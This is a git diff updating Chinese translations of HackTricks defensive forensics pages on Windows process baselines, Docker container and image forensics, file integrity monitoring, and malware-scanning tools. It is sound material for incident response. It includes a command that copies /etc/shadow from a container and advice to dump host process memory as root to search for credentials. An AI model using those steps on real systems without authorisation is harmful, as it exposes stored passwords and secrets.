|
||||
在会话0中启动**services.exe**,**lsass.exe**和**lsm.exe**。应该只有1个进程。
|
||||
**Windows 初始化进程**。\
|
||||
在会话 0 中启动 **services.exe**、**lsass.exe** 和 **lsm.exe**。应该只有 1 个进程。
|
||||
|
||||
|
||||
## userinit.exe
|
||||
|
||||
**用户登录应用程序**。\
|
||||
加载**HKCU**中的**ntduser.dat**,初始化**用户环境**,运行**登录脚本**和**GPO**。
|
||||
**Userinit 登录应用程序**。\
|
||||
加载 **HKCU** 中的 **ntduser.dat** 并初始化**用户环境**,运行**登录脚本**和**GPO**。
|
||||
|
||||
它启动**explorer.exe**。
|
||||
它启动 **explorer.exe**。
|
||||
|
||||
|
||||
## lsm.exe
|
||||
|
||||
**本地会话管理器**。\
|
||||
它与smss.exe一起操作用户会话:登录/注销,启动shell,锁定/解锁桌面等。
|
||||
它与 smss.exe 一起操作用户会话:登录/注销、启动 shell、锁定/解锁桌面等。
|
||||
|
||||
在W7之后,lsm.exe被转换为一个服务(lsm.dll)。
|
||||
在 W7 之后,lsm.exe 被转换为一个服务(lsm.dll)。
|
||||
|
||||
在W7中应该只有1个进程,其中一个服务运行该DLL。
|
||||
在 W7 中应该只有 1 个进程,其中一个服务运行 DLL。
|
||||
|
||||
|
||||
## services.exe
|
||||
|
||||
**服务控制管理器**。\
|
||||
它**加载**配置为**自动启动**的**服务**和**驱动程序**。
|
||||
**加载**配置为**自动启动**的**服务**和**驱动程序**。
|
||||
|
||||
它是**svchost.exe**,**dllhost.exe**,**taskhost.exe**,**spoolsv.exe**等的父进程。
|
||||
它是 **svchost.exe**、**dllhost.exe**、**taskhost.exe**、**spoolsv.exe** 等的父进程。
|
||||
|
||||
服务在`HKLM\SYSTEM\CurrentControlSet\Services`中定义,此进程在内存中维护服务信息的数据库,可以通过sc.exe查询。
|
||||
服务在 `HKLM\SYSTEM\CurrentControlSet\Services` 中定义,此进程在内存中维护服务信息的数据库,可以通过 sc.exe 查询。
|
||||
|
||||
请注意,**一些** **服务**将在**自己的进程中运行**,而其他服务将在**共享的svchost.exe进程中运行**。
|
||||
请注意,**一些** **服务**将在**自己的进程中运行**,而其他服务将**共享 svchost.exe 进程**。
|
||||
|
||||
应该只有1个进程。
|
||||
应该只有 1 个进程。
|
||||
|
||||
|
||||
## lsass.exe
|
||||
|
||||
**本地安全机构子系统**。\
|
||||
它负责用户**身份验证**和创建**安全** **令牌**。它使用位于`HKLM\System\CurrentControlSet\Control\Lsa`中的身份验证包。
|
||||
负责用户**身份验证**和创建**安全令牌**。它使用位于 `HKLM\System\CurrentControlSet\Control\Lsa` 中的身份验证包。
|
||||
|
||||
它写入**安全** **事件** **日志**,应该只有1个进程。
|
||||
它写入**安全** **事件** **日志**,应该只有 1 个进程。
|
||||
|
||||
请记住,这个进程经常受到攻击以转储密码。
|
||||
|
||||
|
@ -90,53 +91,55 @@
|
|||
## svchost.exe
|
||||
|
||||
**通用服务主机进程**。\
|
||||
它在一个共享进程中托管多个DLL服务。
|
||||
在一个共享进程中托管多个 DLL 服务。
|
||||
|
||||
通常,您会发现**svchost.exe**是使用`-k`标志启动的。这将启动对注册表**HKEY\_LOCAL\_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost**的查询,其中将包含一个带有-k参数的键,其中包含要在同一进程中启动的服务。
|
||||
通常,您会发现 **svchost.exe** 是带有 `-k` 标志启动的。这将启动对注册表 **HKEY\_LOCAL\_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost** 的查询,其中将包含带有 `-k` 中提到的参数的键,该键将包含要在同一进程中启动的服务。
|
||||
|
||||
例如:`-k UnistackSvcGroup`将启动:`PimIndexMaintenanceSvc MessagingService WpnUserService CDPUserSvc UnistoreSvc UserDataSvc OneSyncSvc`
|
||||
例如:`-k UnistackSvcGroup` 将启动:`PimIndexMaintenanceSvc MessagingService WpnUserService CDPUserSvc UnistoreSvc UserDataSvc OneSyncSvc`
|
||||
|
||||
如果还使用了**`-s`标志**并带有参数,则要求svchost仅在此参数中启动指定的服务。
|
||||
如果还使用了 **`-s` 标志** 并带有参数,则要求 svchost 仅启动此参数中指定的服务。
|
||||
|
||||
将会有几个`svchost.exe`进程。如果其中任何一个**没有使用`-k`标志**,那就非常可疑。如果发现**services.exe不是父进程**,那也非常可疑。
|
||||
将会有几个 `svchost.exe` 进程。如果其中任何一个**没有使用 `-k` 标志**,那就非常可疑。如果发现**services.exe 不是父进程**,那也非常可疑。
|
||||
|
||||
|
||||
## taskhost.exe
|
||||
|
||||
此进程充当运行自DLL的进程的主机。它还加载从DLL运行的服务。
|
||||
此进程充当从 DLL 运行的进程的主机。它还加载从 DLL 运行的服务。
|
||||
|
||||
在W8中称为taskhostex.exe,在W10中称为taskhostw.exe。
|
||||
在 W8 中称为 taskhostex.exe,在 W10 中称为 taskhostw.exe。
|
||||
|
||||
|
||||
## explorer.exe
|
||||
|
||||
这是负责**用户桌面**和通过文件扩展名启动文件的进程。
|
||||
|
||||
**每个已登录用户**应该生成**只有1个**进程。
|
||||
**每个已登录用户**应该生成**仅 1 个进程**。
|
||||
|
||||
这是从**userinit.exe**运行的,应该被终止,因此此进程的**没有父进程**应该出现。
|
||||
这是从 **userinit.exe** 运行的,应该被终止,因此此进程的**父进程**中不应该出现任何内容。
|
||||
|
||||
|
||||
# 捕获恶意进程
|
||||
|
||||
* 它是否从预期路径运行?(没有Windows二进制文件从临时位置运行)
|
||||
* 它是否与奇怪的IP通信?
|
||||
* 检查数字签名(Microsoft工件应该被签名)
|
||||
* 它是否从预期路径运行?(没有 Windows 二进制文件从临时位置运行)
|
||||
* 它是否与奇怪的 IP 进行通信?
|
||||
* 检查数字签名(Microsoft 的工件应该是签名的)
|
||||
* 拼写正确吗?
|
||||
* 是否在预期SID下运行?
|
||||
* 是否在预期的 SID 下运行?
|
||||
* 父进程是否是预期的(如果有的话)?
|
||||
* 子进程是否是预期的?(没有cmd.exe、wscript.exe、powershell.exe..?)
|
||||
* 子进程是否是预期的?(没有 cmd.exe、wscript.exe、powershell.exe..?)
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
学习和实践AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习和实践GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 **HackTricks** 和 **HackTricks Cloud** 的 github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,18 +1,19 @@
|
|||
# Docker取证
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并实践AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并实践GCP Hacking:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家(GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中被广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## 容器修改
|
||||
|
||||
|
@ -22,7 +23,7 @@ docker ps
|
|||
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
|
||||
cc03e43a052a lamp-wordpress "./run.sh" 2 minutes ago Up 2 minutes 80/tcp wordpress
|
||||
```
|
||||
您可以轻松地使用以下命令查找有关此容器对镜像所做修改:
|
||||
您可以使用以下命令轻松**查找对此容器所做的与镜像相关的修改**:
|
||||
```bash
|
||||
docker diff wordpress
|
||||
C /var
|
||||
|
@ -47,13 +48,13 @@ docker run -d lamp-wordpress
|
|||
docker cp b5d53e8b468e:/etc/shadow original_shadow #Get the file from the newly created container
|
||||
diff original_shadow shadow
|
||||
```
|
||||
如果发现**添加了一些可疑文件**,您可以访问容器并进行检查:
|
||||
如果发现**已添加一些可疑文件**,您可以访问容器并进行检查:
|
||||
```bash
|
||||
docker exec -it wordpress bash
|
||||
```
|
||||
## 图像修改
|
||||
|
||||
当您获得一个导出的 Docker 镜像(可能是 `.tar` 格式)时,您可以使用 [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) 来 **提取修改的摘要**:
|
||||
当您获得一个导出的 Docker 镜像(可能是 `.tar` 格式)时,您可以使用 [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) 来**提取修改的摘要**:
|
||||
```bash
|
||||
docker save <image> > image.tar #Export the image to a .tar file
|
||||
container-diff analyze -t sizelayer image.tar
|
||||
|
@ -70,7 +71,7 @@ tar -xf image.tar
|
|||
```bash
|
||||
docker inspect <image>
|
||||
```
|
||||
您还可以使用以下命令获取**更改历史记录摘要**:
|
||||
您还可以使用以下命令获取**更改历史摘要**:
|
||||
```bash
|
||||
docker history --no-trunc <image>
|
||||
```
|
||||
|
@ -90,16 +91,31 @@ Loaded image: flask:latest
|
|||
#And then open it with dive:
|
||||
sudo dive flask:latest
|
||||
```
|
||||
这使您能够**浏览Docker镜像的不同blob**,并检查哪些文件已被修改/添加。**红色**表示已添加,**黄色**表示已修改。使用**tab**键切换到其他视图,使用**空格**键折叠/打开文件夹。
|
||||
这允许您**浏览 Docker 镜像的不同 blob**,并检查哪些文件已被修改/添加。**红色**表示已添加,**黄色**表示已修改。使用**tab**键切换到其他视图,使用**空格**键折叠/打开文件夹。
|
||||
|
||||
使用die,您将无法访问镜像不同阶段的内容。要这样做,您需要**解压缩每个层并访问它**。\
|
||||
您可以从解压缩镜像的目录中解压缩图像的所有层,执行:
|
||||
使用 die,您将无法访问镜像不同阶段的内容。要这样做,您需要**解压每个层并访问它**。\
|
||||
您可以从解压缩镜像的目录中解压缩镜像的所有层,执行:
|
||||
```bash
|
||||
tar -xf image.tar
|
||||
for d in `find * -maxdepth 0 -type d`; do cd $d; tar -xf ./layer.tar; cd ..; done
|
||||
```
|
||||
## 从内存中获取凭据
|
||||
## 从内存中获取凭证
|
||||
|
||||
请注意,当您在主机内运行一个docker容器时,**您可以从主机上运行`ps -ef`命令来查看容器中运行的进程**
|
||||
请注意,当您在主机内运行一个 Docker 容器时,**您可以从主机上运行 `ps -ef` 命令来查看容器中运行的进程**
|
||||
|
||||
因此(作为root用户)您可以从主机中**转储进程的内存**,并搜索凭据,就像[**以下示例**](../../linux-hardening/privilege-escalation/#process-memory)中一样。
|
||||
因此(作为 root 用户)您可以从主机中**转储进程的内存**,并搜索**凭证**,就像[**以下示例**](../../linux-hardening/privilege-escalation/#process-memory)中一样。
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,30 +1,31 @@
|
|||
{% hint style="success" %}
|
||||
学习和实践AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习和实践GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
# 基线
|
||||
|
||||
基线包括对系统的某些部分进行快照,以便**将来与之进行比较以突出变化**。
|
||||
基线包括对系统的某些部分进行快照,以便与将来的状态进行比较以突出变化。
|
||||
|
||||
例如,您可以计算并存储文件系统中每个文件的哈希值,以便找出哪些文件已被修改。\
|
||||
还可以对创建的用户帐户、运行的进程、运行的服务以及任何其他不应该或根本不应该发生太多变化的事物进行此操作。
|
||||
还可以对创建的用户帐户、运行的进程、运行的服务以及任何其他不应该或根本不应该发生太大变化的事物进行此操作。
|
||||
|
||||
## 文件完整性监控
|
||||
|
||||
文件完整性监控(FIM)是一种关键的安全技术,通过跟踪文件的更改来保护IT环境和数据。它包括两个关键步骤:
|
||||
文件完整性监控(FIM)是一种关键的安全技术,通过跟踪文件的更改来保护 IT 环境和数据。它包括两个关键步骤:
|
||||
|
||||
1. **基线比较:** 使用文件属性或加密校验和(如MD5或SHA-2)建立基线,以便将来进行比较以检测修改。
|
||||
1. **基线比较:** 使用文件属性或加密校验和(如 MD5 或 SHA-2)建立基线,以便将来进行比较以检测修改。
|
||||
2. **实时更改通知:** 当文件被访问或更改时立即收到警报,通常通过操作系统内核扩展。
|
||||
|
||||
## 工具
|
||||
|
@ -32,21 +33,22 @@
|
|||
* [https://github.com/topics/file-integrity-monitoring](https://github.com/topics/file-integrity-monitoring)
|
||||
* [https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software](https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software)
|
||||
|
||||
# 参考资料
|
||||
## 参考资料
|
||||
|
||||
* [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it)
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
学习和实践AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习和实践GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,18 +1,19 @@
|
|||
# 恶意软件分析
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习 AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习 GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## 取证备忘单
|
||||
|
||||
|
@ -37,7 +38,7 @@ sudo apt-get install -y yara
|
|||
#### 准备规则
|
||||
|
||||
使用此脚本从 github 下载并合并所有 yara 恶意软件规则:[https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\
|
||||
创建 _**rules**_ 目录并执行该脚本。这将创建一个名为 _**malware\_rules.yar**_ 的文件,其中包含所有恶意软件的 yara 规则。
|
||||
创建名为 _**rules**_ 的目录并执行该脚本。这将创建一个名为 _**malware\_rules.yar**_ 的文件,其中包含所有恶意软件的 yara 规则。
|
||||
```bash
|
||||
wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py
|
||||
mkdir rules
|
||||
|
@ -69,7 +70,7 @@ clamscan folderpath #Scan the whole folder
|
|||
```
|
||||
### [Capa](https://github.com/mandiant/capa)
|
||||
|
||||
**Capa**检测可执行文件中的潜在恶意功能:PE、ELF、.NET。因此,它会发现诸如Att\&ck战术或可疑功能,例如:
|
||||
**Capa**检测可执行文件中的潜在恶意功能:PE、ELF、.NET。因此,它将查找诸如Att\&ck战术或可疑功能,例如:
|
||||
|
||||
- 检查OutputDebugString错误
|
||||
- 作为服务运行
|
||||
|
@ -80,14 +81,14 @@ clamscan folderpath #Scan the whole folder
|
|||
### IOCs
|
||||
|
||||
IOC表示威胁指标。IOC是一组**用于识别**一些潜在不受欢迎的软件或已确认**恶意软件**的条件。蓝队使用这种定义来在其**系统**和**网络**中**搜索此类恶意文件**。\
|
||||
共享这些定义非常有用,因为当在计算机中识别恶意软件并为该恶意软件创建IOC时,其他蓝队可以使用它更快地识别恶意软件。
|
||||
共享这些定义非常有用,因为当在计算机中识别出恶意软件并为该恶意软件创建了一个IOC时,其他蓝队可以使用它更快地识别出该恶意软件。
|
||||
|
||||
创建或修改IOC的工具是[**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**。**\
|
||||
您可以使用诸如[**Redline**](https://www.fireeye.com/services/freeware/redline.html)之类的工具在设备中**搜索定义的IOC**。
|
||||
创建或修改IOCs的工具是[**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**。**\
|
||||
您可以使用诸如[**Redline**](https://www.fireeye.com/services/freeware/redline.html)之类的工具在设备中**搜索定义的IOCs**。
|
||||
|
||||
### Loki
|
||||
|
||||
[**Loki**](https://github.com/Neo23x0/Loki)是一个用于简单威胁指标的扫描器。\
|
||||
[**Loki**](https://github.com/Neo23x0/Loki)是一个用于简单威胁指标的扫描程序。\
|
||||
检测基于四种检测方法:
|
||||
```
|
||||
1. File Name IOC
|
||||
|
@ -104,7 +105,7 @@ Compares process connection endpoints with C2 IOCs (new since version v.10)
|
|||
```
|
||||
### Linux 恶意软件检测
|
||||
|
||||
[**Linux 恶意软件检测 (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) 是一个针对 Linux 的恶意软件扫描器,采用 GNU GPLv2 许可发布,旨在解决共享托管环境中面临的威胁。它利用来自网络边缘入侵检测系统的威胁数据,提取正在攻击中使用的恶意软件,并生成用于检测的签名。此外,威胁数据还来自用户提交的数据,使用 LMD 结账功能以及恶意软件社区资源。
|
||||
[**Linux 恶意软件检测 (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) 是一个针对 Linux 的恶意软件扫描器,采用 GNU GPLv2 许可发布,旨在针对共享托管环境中面临的威胁。它利用来自网络边缘入侵检测系统的威胁数据,提取正在攻击中活跃使用的恶意软件,并生成用于检测的签名。此外,威胁数据还来自用户提交的具有 LMD 检出功能和恶意软件社区资源。
|
||||
|
||||
### rkhunter
|
||||
|
||||
|
@ -114,7 +115,7 @@ sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--sk
|
|||
```
|
||||
### FLOSS
|
||||
|
||||
[**FLOSS**](https://github.com/mandiant/flare-floss) 是一个工具,将尝试使用不同的技术在可执行文件中查找混淆的字符串。
|
||||
[**FLOSS**](https://github.com/mandiant/flare-floss) 是一个工具,将尝试使用不同的技术来查找可执行文件中的混淆字符串。
|
||||
|
||||
### PEpper
|
||||
|
||||
|
@ -122,23 +123,23 @@ sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--sk
|
|||
|
||||
### PEstudio
|
||||
|
||||
[PEstudio](https://www.winitor.com/download) 是一个工具,可以获取 Windows 可执行文件的信息,如导入、导出、头部,还会检查病毒总数并查找潜在的 Att\&ck 技术。
|
||||
[PEstudio](https://www.winitor.com/download) 是一个工具,允许获取有关 Windows 可执行文件的信息,如导入、导出、头部,还会检查病毒总数并查找潜在的 Att\&ck 技术。
|
||||
|
||||
### Detect It Easy(DiE)
|
||||
|
||||
[**DiE**](https://github.com/horsicq/Detect-It-Easy/) 是一个工具,用于检测文件是否加密,并查找打包程序。
|
||||
[**DiE**](https://github.com/horsicq/Detect-It-Easy/) 是一个工具,用于检测文件是否**加密**,还可以找到**打包程序**。
|
||||
|
||||
### NeoPI
|
||||
|
||||
[**NeoPI**](https://github.com/CiscoCXSecurity/NeoPI) 是一个使用各种统计方法来检测文本/脚本文件中混淆和加密内容的 Python 脚本。NeoPI 的预期目的是帮助检测隐藏的 Web shell 代码。
|
||||
[**NeoPI**](https://github.com/CiscoCXSecurity/NeoPI) 是一个使用各种**统计方法**来检测文本/脚本文件中的**混淆**和**加密**内容的 Python 脚本。NeoPI 的预期目的是帮助**检测隐藏的 Web shell 代码**。
|
||||
|
||||
### **php-malware-finder**
|
||||
|
||||
[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) 尽最大努力检测混淆/可疑代码以及使用 PHP 函数的文件,这些函数通常在恶意软件/webshell 中使用。
|
||||
